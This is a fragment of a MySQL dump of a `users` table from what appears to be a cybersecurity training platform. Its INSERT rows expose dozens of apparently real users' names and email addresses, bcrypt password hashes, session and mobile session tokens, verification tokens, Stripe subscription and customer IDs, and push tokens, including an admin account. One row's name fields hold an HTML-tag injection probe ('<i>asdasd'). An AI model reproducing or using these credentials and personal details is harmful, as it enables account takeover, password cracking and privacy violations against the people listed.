  `email_preferences` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL,
  `session_token` varchar(255) DEFAULT NULL,
  `mobile_session_token` varchar(255) DEFAULT NULL,
  `primary_path` varchar(50) DEFAULT NULL,
  `secondary_path` varchar(50) DEFAULT NULL,
  `expo_push_token` varchar(255) DEFAULT NULL,
  `banner_url` varchar(255) DEFAULT NULL,
  `is_student` tinyint(1) DEFAULT 0,
  `organization_id` int(11) DEFAULT NULL,
  `registration_source` varchar(50) DEFAULT 'web',
  `verification_reminder_sent` tinyint(1) DEFAULT 0,
  `is_subscribed_newsletter` tinyint(1) DEFAULT 1,
  `first_push_sent` tinyint(1) DEFAULT 0
) ;

--
-- Dumping data for table `users`
--

INSERT INTO `users` (`id`, `google_id`, `name`, `email`, `password`, `role`, `profile_picture`, `subscription_plan`, `subscription_status`, `subscription_id`, `customer_id`, `cancel_at_period_end`, `current_period_end`, `plan_start_date`, `plan_end_date`, `renewal_date`, `alerts_this_month`, `last_usage_reset`, `username`, `surname`, `is_verified`, `verification_token`, `reset_password_token`, `reset_password_expires`, `failed_login_attempts`, `lock_until`, `badges`, `created_at`, `subscription_end_date`, `current_mission`, `training_completed`, `email_preferences`, `session_token`, `mobile_session_token`, `primary_path`, `secondary_path`, `expo_push_token`, `banner_url`, `is_student`, `organization_id`, `registration_source`, `verification_reminder_sent`, `is_subscribed_newsletter`, `first_push_sent`) VALUES
(1, NULL, 'Admin', 'halilbaris@gmail.com', '$2a$10$mi7lRWkONSrTxn5aPeQUJu9R6JzJoVHy8GnyxKFq8vPB.Ajo.WcG6', 'admin', '/uploads/1-1767061287330.jpg', 'monthly', 'active', 'sub_1ShZsNL5VKtXn66bbgkTLzUG', 'cus_TetfSZenusTeBk', 0, NULL, NULL, NULL, NULL, 0, '2025-12-12 22:00:24', 'admin', 'User', 1, NULL, '65e71953f566955338d1ea13378febb8a877076aecfc8074751db31375851c04', '2026-01-12 17:18:20', 0, NULL, NULL, '2025-12-12 19:00:24', NULL, 1, 0, '{\"weekly_report\":false,\"alert_assigned\":false,\"investigation_graded\":false,\"newsletter\":false}', '26b2107b88e7c42d0e196faaf1c771f2330f1207e5e37470300c98d5c30cd476', 'e539886fb6f4d5a0f2cc1253c7d0f8923e483139b3131301c83d636f2aa8424c', NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(5, NULL, 'Rose', 'gulmairamsnv@gmail.com', '$2a$10$lcTDAr1stngbpoeDJAWON.rf4cKxAi8I6fuXrTz89vwOqMzRLZLVC', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-16 02:26:08', 'RoseM', 'Maryam', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-15 23:26:08', NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(6, NULL, 'Elif', 'etkinelifilm@gmail.com', '$2a$10$A03K7rDjcC22ePJ9zAHcs.vMbfw9qSYeHER57z7aYcMFOQVv41c2W', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-16 02:46:00', 'cafeantinkuntin', 'E', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-15 23:46:00', NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(7, NULL, 'Murat', 'muratdibi@outlook.com', '$2a$10$fx.y8i1Hq7/nvVfj/nzLfevLAF7SpfzN9LZonOZf6db3ANxM1C1ai', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-16 02:57:15', 'mudics', 'Dibi', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-15 23:57:15', NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(8, NULL, 'Mustafa', 'mustafatorun@gmail.com', '$2a$10$s8s4.SrBLUcV94UKjrrbZuydNoiWGXxVWm0iz6Q3zD0BNOuCkdHe.', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-16 03:56:15', 'mustafa', 'Torun', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-16 00:56:15', NULL, 1, 0, '{\"weekly_report\": false, \"alert_assigned\": false, \"investigation_graded\": false, \"newsletter\": false}', '58f13a4e1e6cab5220426a382ae92801da197921267eaacf27d3d3f8436fdfd7', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(16, NULL, 'Michael', 'harleycoplan7@hotmail.com', '$2a$10$drUDZsP4zZn82pno3TZFHeK3haIOn/thxwmAPujjLBdJXvbNffQOq', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-17 20:36:33', 'Michael7', 'Coplan', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-17 17:36:33', NULL, 2, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(17, NULL, 'Nic', 'bnicolepeeples@icloud.com', '$2a$10$YFtWqBYyIVj6xa8YNL1bL.ckFR7HmVLGZnsQYZTtbTP6P3P3fE44y', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-17 20:45:52', 'Nicpeeps', 'Peeps', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-17 17:45:52', NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(18, NULL, '<i>asdasd', 'xmglcalwxppluopcgf@enotj.com', '$2a$10$f97OaLfPTnr1JPWsWWIOweT/lPFGS7SZHhEuRlh.YzCdVNchOiaH2', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2025-12-17 22:10:54', 'xmglcalwxppluopcgf@enotj.com', '<i>asdasd', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-17 19:10:54', NULL, 4, 1, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(19, NULL, 'Salah', 'salah_22313@hotmail.com', '$2a$10$DVie6qZhvrnxJGLnL59Wx.c.M0rHvZzcWU30i3wgu/iPmqs2YCnBO', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-17 22:52:02', 'salahali', 'Ali', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-17 19:52:02', NULL, 2, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(20, NULL, 'Elif', 'newpathtocyber@gmail.com', '$2a$10$lV8pgm.FuoczEHu4uc3lp.DuFt7rCD5OYQKJFRLEwGI/NQMC6wz8i', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2025-12-18 02:22:14', 'elif', 'yilmaz', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-17 23:22:14', NULL, 4, 1, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(21, NULL, 'Muhammad ', 'hamzam9878@gmail.com', '$2a$10$XWnohhivsKxqlVnU595qCOSQD2fHr786rC8O6p3vA0febylQtG2uO', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-18 03:07:17', 'hamzam9878@gmail.com', 'Hamza', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-18 00:07:17', NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(22, NULL, 'Alex', 'alec.aextecki@gmail.com', '$2a$10$2cWyxgquQCtGY.7bHgjeRuqq0Jd7/dxhf/x9uAtFJr1AjIO9gK24a', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 2, '2025-12-18 03:43:57', 'aextecki', 'Mortel', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-18 00:43:57', NULL, 4, 1, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(24, NULL, 'Gergana ', 'german4eto@gmail.com', '$2a$10$oaFNOjCfqCHmoQbyRd7aFOpH1uA6xUyX8IfzTwMMrNo6rXbjVebre', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-18 07:03:48', 'gerimira', 'Hristova', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-18 04:03:48', NULL, 4, 1, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(28, NULL, 'Geo', 'skegeo@yahoo.com', '$2a$10$6xZkrZMxZXzzGoBte7O/u.JcuS6X3UNI2agh/kZCncWC1DnYNUQAK', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 3, '2026-03-16 00:09:16', 'skegeo', 'Ske', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-21 22:42:48', NULL, 1, 0, NULL, '37c4e07796f3db214231d5a468fdbed2ad9264b27164d5aa481a1ead989a3019', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(34, NULL, 'Jacob', 'jacob109@infoseclabs.io', '$2a$10$xhEZW.s7vvgw81SV/2vkp.eInLWcMLgfFulVcv3FHDrrNiES6KceS', 'pro', '/uploads/34-1772405497758.png', 'monthly', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 3, '2025-12-25 23:03:58', 'jacob', 'Myfield', 1, 'bd902b38b615ba7100347f9a54839416a5ceb1201cddcb8d949c2797cd65e640', NULL, NULL, 0, NULL, '[{\"id\":\"golden_analyst\",\"name\":\"Golden Analyst\",\"awarded_at\":\"2026-01-01T21:15:34.548Z\",\"description\":\"Awarded for 1st Place in the monthly leaderboard (Gold).\",\"type\":\"gold\"},{\"id\":\"golden_analyst\",\"name\":\"Golden Analyst\",\"awarded_at\":\"2026-01-31T21:00:00.092Z\",\"description\":\"Awarded for 1st Place in the monthly leaderboard (Gold).\",\"type\":\"gold\"},{\"id\":\"golden_analyst\",\"name\":\"Golden Analyst\",\"awarded_at\":\"2026-01-31T21:00:00.143Z\",\"description\":\"Awarded for 1st Place in the monthly leaderboard (Gold).\",\"type\":\"gold\"},{\"id\":\"golden_analyst\",\"name\":\"Golden Analyst\",\"awarded_at\":\"2026-01-31T21:00:00.170Z\",\"description\":\"Awarded for 1st Place in the monthly leaderboard (Gold).\",\"type\":\"gold\"}]', '2025-12-25 20:03:58', NULL, 1, 0, '{\"weekly_report\":false,\"alert_assigned\":false,\"investigation_graded\":false,\"newsletter\":false}', '3a4fd82cddf34323b0d9b20659dbb2c962bbc7099b2810f198730f9f3128b9aa', 'e1f60cfd4f73726d9f594c2dfdb0efd29d58a395022482ba04d2442df348605e', 'CLOUD', 'TI', 'ExponentPushToken[mpBXfZHQhy10xWYYrTA2Xq]', NULL, 0, NULL, 'web', 0, 1, 0),
(39, NULL, 'Pranith', 'zyrenic@cc.cc', '$2a$10$zs0UdjQyPXyIuyO/GlHZI.YBgMlnW0lvH6LLV4lsIS1mLFCoEEct2', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-27 06:56:25', 'xenoz84', 'Jain ', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-27 03:56:25', NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(40, NULL, 'Nathalia', 'nathaliabolinja@gmail.com', '$2a$10$nSLd.6e0I9v1ffUr6LvFWulvdOTe7M/vrpiQZtozVZRH.NzYLRlM.', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2025-12-27 07:13:07', 'nbj', 'Bolinja', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-27 04:13:07', NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(41, NULL, 'Sam', 'samrock0588@gmail.com', '$2a$10$zxrRXlCZ2sVKAUE5Tl9iOuctKzSj8NRQa7HdnDiakeYsdyiBQAZ3K', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 3, '2025-12-27 13:28:37', 'samrock89', 'Rock', 1, NULL, NULL, NULL, 0, NULL, '[{\"id\":\"bronze_analyst\",\"name\":\"Bronze Analyst\",\"awarded_at\":\"2026-01-01T21:15:34.789Z\",\"description\":\"Awarded for 3rd Place in the monthly leaderboard (Bronze).\",\"type\":\"bronze\"}]', '2025-12-27 10:28:37', NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(42, NULL, 'Recep', 'recepercik@gmail.com', '$2a$10$mLouep1/nmKp6nDLAAaRHeLLwu9UiqpaJWKTddqfxwU1b5T1kiIqm', 'pro', NULL, 'yearly', 'active', 'sub_1SjwmvL5VKtXn66bwHdc4jQW', 'cus_ThLTNxhBJ7LUrI', 0, NULL, NULL, NULL, NULL, 1, '2025-12-27 14:49:51', 'Recc_SecX', 'Ercik', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-27 11:49:51', NULL, 1, 0, NULL, '640664a28b3f540d1659c39dc1293781b41bc058312461ee09883f48798442a3', NULL, 'NDR', NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(44, NULL, 'Denver ', 'info@infoseclabs.io', '$2a$10$ihc/XIpj7D.Y6OpgY6mUC.vFxCbr.jH/4a0Q/7nwugCwAJv14EpTC', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2025-12-27 23:59:18', 'Denver', 'Benim ', 1, 'ac2d5a96b8ac43d9b1b8b4b59f50e1f2233c13cc8dbe8665eb6afb8fe5ddbb73', NULL, NULL, 1, NULL, NULL, '2025-12-27 20:59:18', NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(45, NULL, 'Faith', 'faithgambrill1990@gmail.com', '$2a$10$WlYfpKKH33nthaVBvjzay.3Cj732JXBEZfLAh4q5u5THZ.o2XFR.G', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2025-12-28 20:13:10', 'faithgamb', 'Gambrill', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-28 17:13:10', NULL, 1, 0, NULL, '8f24db975a0a9177f410cdbad5d782dbfa551576841a0e5274fb3790b1606856', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(49, NULL, 'Uzair', 'uzairalviis@gmail.com', '$2a$10$cgXmMT2pq8jQXzFwurXpVOaxIkKwrx7QplsChxopuIxRP.fq5kVVy', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-01-05 01:30:51', 'uzairalvi', 'Alvi', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-28 19:54:53', NULL, 1, 0, NULL, '708a3b53134b605c7660ead87e02e1abb4a8a4317a2ff75bc8ee579a13d1e644', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(50, NULL, 'Torrin', 'torrin.smith.ts@icloud.com', '$2a$10$wd5YB7fmPT0QLT.xLxX6WOMF3TexCcFnKLsIGjaKhZbRhRX4XP5DG', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-29 00:32:20', 'CloudSpanNetworks', 'Smith', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-28 21:32:20', NULL, 1, 0, NULL, 'be68f8397df78d474c2b7d73af095991e2b5d1126d72b43b88cef94fa780df25', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(51, NULL, 'Oscar', 'ojaime@infoseclabs.io', '$2a$10$K9eSXtVvNguHIzySt.v.Q.i3owXroEKpUzvDNXU43XXS71OKtREKm', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2025-12-29 00:55:57', 'oscar2025', 'Jaime', 1, '2a9fae3d956b0da3f110872a8af9ab3cb25412c5b9dd10068b6efd9ed6f635a3', NULL, NULL, 0, NULL, NULL, '2025-12-28 21:55:57', NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(52, NULL, 'Roy ', 'roymcdnld89@gmail.com', '$2a$10$YqVcltNZvQyMpPkXCfG/xe0Pb/rBageehhvvECJKnVrEbtztCBLt6', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-01-19 11:46:26', 'Mac25', 'Mcdonald', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-29 00:28:27', NULL, 1, 0, NULL, 'bba63df31161710eb41ee06faa9e853101943380e64df010d812f122a53a7f38', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(53, NULL, 'Steven', 'Steviebsofly29@gmail.com', '$2a$10$Uvli/AGQM8w46wVetX5B8uouyjFsJdFWDnhTL6JBPiUWyQJpUiL3K', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-29 10:28:59', 'steviebsofly', 'Rodriguez', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-29 07:28:59', NULL, 1, 0, NULL, '57c25b557333904605e0da0c5fcf8524c77ab6dbbfd33d3b5d0de97ab91e0f52', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(54, NULL, 'Jentsey', 'jello6006@gmail.com', '$2a$10$UYQhHzOqSDIVM5EdXaNPJ.MQtq0RJ1aqPBuQ5xoJyccI7kqgmMtWa', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 3, '2026-01-03 19:56:37', 'Jentsey', 'Lucero', 1, NULL, NULL, NULL, 0, NULL, '[{\"id\":\"silver_analyst\",\"name\":\"Silver Analyst\",\"awarded_at\":\"2026-01-01T21:15:34.714Z\",\"description\":\"Awarded for 2nd Place in the monthly leaderboard (Silver).\",\"type\":\"silver\"},{\"id\":\"silver_analyst\",\"name\":\"Silver Analyst\",\"awarded_at\":\"2026-01-31T21:00:00.435Z\",\"description\":\"Awarded for 2nd Place in the monthly leaderboard (Silver).\",\"type\":\"silver\"}]', '2025-12-29 21:29:24', NULL, 1, 0, NULL, 'f7ee87c258eb81fe8cf28ad7f0594ca3fe47cbc7bdcd1da0b57c32b2bb17051f', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(55, NULL, 'Venetta', 'venettasmithen28@gmail.com', '$2a$10$qC/rx9kzLXscr2th2/gjn.X5F9D6xxA9HurEKhg1RSZyh.WOkkibK', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-03-09 15:47:22', 'Venettas', 'Smithen ', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-31 01:11:22', NULL, 1, 0, NULL, 'ff7b19470b30d56a076f0dc4520c991de7527e0205493518324f1c2c728f18e0', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(56, NULL, 'dai', 'daichizan@twdzq.onmicrosoft.com', '$2a$10$HTJGk8cgl1/6S3E7D9pyBuQF4h7avgUcP4TeD5rdV5kTjpCDiiMd.', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 3, '2026-03-03 18:51:36', 'daichizan', 'chizan', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-31 07:24:05', NULL, 1, 0, '{\"weekly_report\":false,\"alert_assigned\":false,\"investigation_graded\":false,\"newsletter\":false}', '007bcd44f9c3a2798a65e56bb91f80f34454918f75f686e418785ef9ccd265f9', NULL, 'CLOUD', 'IR', NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(58, NULL, 'Ricardo', 'ricky.garcia.mail@gmail.com', '$2a$10$ZzpDnpA1rvKSmGRGXDAd2ufLqpKpOiSULjAESvofgBwLaz4W42d0S', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-31 17:33:15', 'geekyface', 'Garcia', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-31 14:33:15', NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(60, NULL, 'Lori', 'loriadam27@gmail.com', '$2a$10$aQASLPeMBmfx.pVn76EhHOASv5guDKaGj2OYcRFQMzbtNN/xmVVvm', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-02 03:49:19', 'loria25', 'Adam', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-02 00:49:19', NULL, 1, 0, NULL, '6b2e97b73f8b9d6b62f44aa1c829d6e3518d1f64082d0dd51192919b2626d5d1', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(61, NULL, 'shiphrah', 'wairimashiphrah@gmail.com', '$2a$10$FrZ5AhpULMyeD175PgRnd.UPva1u.jx5oR/PmTv1WKl9lKZoQqAoy', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-02 09:46:41', 'VI', 'wairima', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-02 06:46:41', NULL, 1, 0, NULL, '47e0735ef6a83c998f50d67b5a1a2845073bda27a6ebbfd9349fcd794295cc86', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(62, NULL, 'Mohammed Al Sakini', 'iraqmoka@gmail.com', '$2a$10$a0V7rXUcmfFLh47KBTrKtOc53XHdS1cuC6GlJjTq3skX9.Cvjyxw2', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-02 14:36:35', 'Moka ', 'Al Sakini', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-02 11:36:35', NULL, 1, 0, NULL, '940c70366e03157a6fa2fd10ccdcae0c8f411589be66ed1ec14c182a5346ebbb', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(64, NULL, 'Mualla', 'mualladincer87@gmail.com', '$2a$10$fRpXNBlVcOhCxHb43iJq3eAtozJKQuAxi/ZSxukx/hPrO0s7qoJfa', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-01-04 00:32:47', 'mualladincer ', 'Dincer', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-03 21:32:47', NULL, 1, 0, NULL, '8bae2e42e0e6bf875227127eb3b771f4d28901440609100109e3f3a29236105f', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(65, NULL, 'Mohamed ', 'zssaul.inc@gmail.com', '$2a$10$2RDZ/AJPacLQwNvs3snKbOA9uQogEuQu693orYoAts1WaEbz2KwQm', 'normal', NULL, 'free', 'active', 'sub_1SmTzpL5VKtXn66b6q2VkfrF', 'cus_TjxvpymtxyaqrC', 0, NULL, NULL, NULL, NULL, 0, '2026-01-06 09:39:54', 'Simo', 'zouitine', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-06 06:39:54', NULL, 1, 0, NULL, 'b563f831338a6ab6ab7a2621fb9fa0e837d7c7b8cf35a154ef42776b0e9a3332', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(67, NULL, 'Al', 'sec2200.txwcm@slmails.com', '$2a$10$XUlsLb/21VJz8wb63CelVuo89tjvgDL1CJM0b9QxlQdjYlaew.tea', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-07 06:07:05', 'al991', 'al', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-07 03:07:05', NULL, 1, 0, NULL, '3509b13d54b8105f320d9f13cfe3ebfaa955880c26fd813b096b91d268479620', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(68, NULL, 'Kiera', 'kierabona0@gmail.com', '$2a$10$4dCAXFMoX2s9RqiBzN23MeVXaZgZ9Pmb9QccOjXvCptGnsnmTYjlW', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-01-07 18:58:56', 'kierabon', 'Bonaparte', 1, NULL, NULL, NULL, 0, NULL, '[{\"id\":\"bronze_analyst\",\"name\":\"Bronze Analyst\",\"awarded_at\":\"2026-01-31T21:00:01.502Z\",\"description\":\"Awarded for 3rd Place in the monthly leaderboard (Bronze).\",\"type\":\"bronze\"},{\"id\":\"bronze_analyst\",\"name\":\"Bronze Analyst\",\"awarded_at\":\"2026-01-31T21:00:01.509Z\",\"description\":\"Awarded for 3rd Place in the monthly leaderboard (Bronze).\",\"type\":\"bronze\"}]', '2026-01-07 15:58:56', NULL, 1, 0, NULL, '8897163a3314e1aeb094cfe9af8dccbf71c1e66c797bf96808aea8b9c3993bf3', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(70, NULL, 'chisom', 'chisomonyebuchi09@gmail.com', '$2a$10$AUEfcteEV3ASYyBdMm4B7ut82lhfWCS8D4r/H5hzrUgfcCWdMRAoW', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-08 17:51:54', 'kaycee', 'onyebuchi', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-08 14:51:54', NULL, 1, 0, NULL, '069ef124ae9ae1c7a6f7e3c69bb0f11fff7ba8e17ca970294a7fadf6fc45c715', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(71, NULL, 'Beth', 'Bmendvz@gmail.com', '$2a$10$wrQ.yPUP.IVCT2xTz5tkCORWS1V23712hCFfRenyqoeySpUH4DoS6', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-10 09:32:01', 'Jesusgohome', 'Mendoza', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-10 06:32:01', NULL, 1, 0, NULL, '1cc2310e29136efb84286c1f101c125024553c22bfc025f745a257c3db042c35', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(72, NULL, 'Maxwell', 'yesmax82@yahoo.com', '$2a$10$VxUatjNxptd.KoyLathEv.x8z1isalcAsqfrYxxVEVFQ8c8r3Ds8q', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-10 17:11:33', 'yesmax82', 'Owusu', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-10 14:11:33', NULL, 1, 0, NULL, 'bc395dca4d290f03e8faf928bf9bb720c3fb99102af4e51a816fe18746ddf086', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(74, NULL, 'Daniel', 'kabiyesi.consulting@gmail.com', '$2a$10$P1ZJxGevZN7upaSn06J95eRkmpQw5QCucuWL6AoxWqzO/IaDxndd.', 'pro', NULL, 'monthly', 'active', 'sub_1SoefDL5VKtXn66bOl3dppCF', 'cus_TmD56qJnQMXzkz', 0, NULL, NULL, NULL, NULL, 0, '2026-01-12 09:23:29', 'dann432', 'Aweda', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-12 06:23:29', NULL, 1, 0, NULL, 'ea5f42fb601ada2d6e877d3b7459d5e60a1622e567ea6b41acb25f2559c2a50b', NULL, 'IR', 'EDR', NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(77, NULL, 'Justin', 'tipilo7506@ixospace.com', '$2a$10$tzFl8b21qoDWluwmoViW4OJDBLqaH2fbEYqjO4cKts090WP29mRJO', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-14 03:44:04', 'Aday', 'Garcia', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-14 00:44:04', NULL, 1, 0, NULL, NULL, '01b379518ecb6a03e73956adb331c1e099c29a76808d5940cf47545dd27df4e9', NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(78, NULL, 'Google', 'google@infoseclabs.io', '$2a$10$dHZ.sZNJ8oOT7vQO9ZEw7.V.g.ZY15a4ZkmYgXMphc.YunjMa39qW', 'normal', NULL, 'monthly', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-14 06:21:01', 'googleadmin', 'Admin', 1, 'fc205d0287fa8f9299bb74c51fa6008426de9a3e0e021cb6f003eccb3f797e70', NULL, NULL, 0, NULL, NULL, '2026-01-14 03:21:01', NULL, 1, 0, NULL, 'c79bdb6d8de0fffd975ac0960eae7d0fc5ef5dae2cdef3f8ccca8cc6eedf0888', 'a2a3d3debcf7801564e3131f836ed199706e7bcbbadcd34bf2ebc99f73c2150b', NULL, NULL, 'ExponentPushToken[LYjxIYOTOc5WAwhTdmKNou]', NULL, 0, NULL, 'web', 0, 1, 0),
